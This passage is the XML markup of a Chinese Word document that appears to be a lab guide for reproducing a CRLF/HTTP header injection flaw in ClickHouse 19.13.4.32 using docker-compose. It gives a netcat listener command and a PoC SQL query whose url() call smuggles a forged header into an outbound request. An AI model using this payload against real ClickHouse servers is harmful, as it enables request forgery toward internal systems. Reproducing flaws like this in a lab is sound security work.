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31966259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6B79E3" w:rsidRPr="006B79E3">
        <w:t>ClickHouse</w:t>
      </w:r>
      <w:r w:rsidR="00695AEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00087362" w:rsidRPr="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>19.13.4.32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，打开命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE76770" w14:textId="1B0F3700" w:rsidR="00087362" w:rsidRDefault="00696786" w:rsidP="00DA0DBA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00087362" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose </w:t>
      </w:r>
      <w:r w:rsidR="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>build构建</w:t>
      </w:r>
      <w:r w:rsidR="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidR="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A30" w14:textId="4C4A0A1D" w:rsidR="00DA0DBA" w:rsidRDefault="00087362" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431719C6" w14:textId="01395059" w:rsidR="00EA3792" w:rsidRDefault="00087362" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose ps</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792"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 w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260C930" w14:textId="459CBC2B" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00087362" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="006B79E3" w:rsidRPr="006B79E3">
        <w:t>ClickHouse</w:t>
      </w:r>
      <w:r w:rsidR="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r w:rsidRPr="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>19.13.4.32</w:t>
      </w:r>
      <w:r w:rsidR="0060137D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，开放端口为8123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35241458" w14:textId="701A3747" w:rsidR="00CD5E58" w:rsidRDefault="00087362" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、复现结束后使用命令</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58" w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r w:rsidR="00CD5E58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> down关闭容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234401B" w14:textId="1EAFEC51" w:rsidR="00864F1A" w:rsidRPr="00EA3792" w:rsidRDefault="00087362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1430A49D" wp14:editId="3DB2F4F3">
            <wp:extent cx="5274310" cy="3458845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="939525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7514894A" w14:textId="77777777" w:rsidR="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 在本机使用 nc 命令监听 1337 端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0F527E" w14:textId="6360C342" w:rsidR="00087362" w:rsidRPr="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -lvp 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC9E30" w14:textId="77777777" w:rsidR="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 进入容器命令行，连接 ClickHouse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF8409" w14:textId="122F9A83" w:rsidR="00087362" w:rsidRPr="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>docker exec -it clickhouse-19.13.4.32 clickhouse-client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26791A26" w14:textId="77777777" w:rsidR="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3. 执行 PoC 语句，本机 IP 为 192.168.233.153</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382A831D" w14:textId="47475DC5" w:rsidR="00087362" w:rsidRPr="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00087362">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT * FROM url('http://192.168.233.153:1337/? HTTP/1.1\r\nTest: test', CSV, 'column1 String');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4BF42" w14:textId="77777777" w:rsidR="00087362" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. 可以看到监听端口返回了一个不符合常规 HTTP 请求格式的头部`Test: test HTTP/1.1`，而这个就是 PoC 中伪造的 HTTP 请求头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D51A" w14:textId="56D8A199" w:rsidR="00864F1A" w:rsidRPr="00864F1A" w:rsidRDefault="00087362" w:rsidP="00087362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30EB37B5" wp14:editId="139A63F1">
            <wp:extent cx="5274310" cy="2048510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="14757983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4F1A" w:rsidRPr="00864F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418B5"/>
    <w:rsid w:val="00087362"/>
    <w:rsid w:val="000D0CC9"/>
    <w:rsid w:val="00137508"/>
    <w:rsid w:val="00183349"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="00277AB1"/>
    <w:rsid w:val="00352466"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="004950A1"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="004D1ED0"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="0060137D"/>
    <w:rsid w:val="00695AEE"/>
    <w:rsid w:val="00696786"/>
    <w:rsid w:val="006B79E3"/>
    <w:rsid w:val="00832EE7"/>
    <w:rsid w:val="00836B6A"/>
    <w:rsid w:val="00861775"/>
    <w:rsid w:val="00864F1A"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="009B33E4"/>
    <w:rsid w:val="009D5886"/>
    <w:rsid w:val="00BB76DC"/>
    <w:rsid w:val="00BC10EC"/>
    <w:rsid w:val="00BC509C"/>
    <w:rsid w:val="00BC5D71"/>
    <w:rsid w:val="00C37C0A"/>
    <w:rsid w:val="00C43EFA"/>
    <w:rsid w:val="00C66350"/>
    <w:rsid w:val="00CD5E58"/>
    <w:rsid w:val="00CD79E1"/>
    <w:rsid w:val="00CF3B8C"/>
    <w:rsid w:val="00D97105"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DB3F6F"/>
    <w:rsid w:val="00DE0246"/>
    <w:rsid w:val="00DF4450"/>
    <w:rsid w:val="00EA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30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-11T12:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>